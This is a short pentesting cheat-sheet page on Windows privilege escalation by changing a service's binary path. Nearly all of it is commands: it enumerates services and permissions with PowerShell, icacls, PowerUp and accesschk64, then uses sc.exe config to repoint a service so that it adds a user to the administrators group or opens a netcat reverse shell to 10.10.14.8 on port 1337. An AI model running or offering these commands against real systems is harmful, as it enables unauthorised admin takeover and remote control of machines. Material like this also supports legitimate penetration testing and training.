Binary Paths

Overview

Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.

Exploitation via Powershell

View services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

View permissions

icacls "C:\xampp\apache\bin\mysqld.exe"

Mask

Permissions

Full access

Modify access

Read and execute access

Read-only access

Write-only access

Replace service binary with malicious one then restart service

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
net stop mysql
net start mysql
shutdown /r /t 0

Exploitation using PowerUp

Run PowerUp on machine

. .\PowerUp.ps1
Invoke-AllChecks

Change the binary path

sc.exe config daclsvc binpath= "net localgroup administrators Greg /add"
sc.exe config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"

Start service

sc.exe start dacl

Exploitation via Accesschk64

Check for services with write permissions

accesschk64.exe --accept-eula -uwcv Everyone *

accesschk64.exe -uwcv daclsvc

Query the service

sc qc daclsvc

Changing the binary path is the same as the last method

PreviousService Permissions NextUnquoted Service Paths

Last updated 1 year ago